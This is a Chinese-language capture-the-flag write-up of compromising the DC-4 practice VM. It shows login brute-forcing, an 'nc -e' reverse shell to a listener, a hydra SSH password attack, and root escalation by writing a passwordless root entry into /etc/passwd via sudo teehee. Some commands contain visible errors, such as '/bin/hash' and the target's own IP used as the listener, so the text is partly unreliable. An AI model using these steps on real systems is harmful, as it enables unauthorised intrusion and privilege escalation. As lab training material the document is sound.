DC-4靶机渗透实战

主机发现

利用该命令扫描当前网段的ip

arp-scan -l

其中192.168.1.123端口的ip就是我们要打的靶机

接着用下面的命令对目标靶机进行扫描

nmap -A -p- 192.168.1.123

漏洞分析

开放了22,和80两个端口,但是22不可直接访问,先访问80端口

是一个登陆界面,利用bp进行抓包爆破,爆破后发现当用户名为admin密码为happy时长度最大,猜测是登录界面的登录密码

输入后进来了一个command界面

点击里面的选项,查看内容

再次使用bp看看界面

靶机监听

尝试反弹shell,利用监听尝试,用bp进行与kali的nc连接

bp:
nc -e /bin/hash 192.168.1.123 8080
kali:
nc -lvp 8080

以防监听不成功,先对bp传入的话进行一次url加密

打开kali的监听

再将bp中的内容进行放包就可以监听到靶机的信息了

为了是命令行进行交互式shell,输入下面的命令

python -c 'import pty;pty.spawn("/bin/bash")'

接着查看id和用户权限

发现权限不够,接着返回到 home中查看相关内容,并在home这个目录中发现了三个用户,先访问一下jim的目录

爆破

发现了old-passwords.bak,读取一下,得到了一些密码

将这些密码保存到Kali中,留着备用

想到22的端口,且这个端口是ssh,可以利用hydra进行爆破

hydra -l jim -P '/home/kali/Desktop/password' 192.168.1.123 ssh -vV -f

爆破到用户名是jim,密码是jibril04

SSH连接

利用ssh进行连接

ssh jim@192.168.1.123

ls后发现当前目录中有三个内容,先访问mbox

看格式有点像邮箱,邮箱文件一般放在/var/mail中,去访问

这封信是charles给jim的信,大概内容是老板要charles将密码给jim,并且密码是:^xHhA&hvim0y

切换charles用户

尝试登陆charles用户

发现charles可以利用sudo权限对teehee运行

查看其他人的wp后发现可以在用这个命令往一个文件追加内容,因此可以在向/etc/passwd写入内容,增加一个root用户

提权

利用下面的命令进行添加用户

sudo teehee -a /etc/passwd
demo::0:0:::/bin/bash

查看passwd文件后发现新的用户demo已经传入进去了

接着跳转到demo用户下

sudo su -

进入到了root用户中,然后用ls列出当前目录下的文件,接着cat读取flag.txt

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值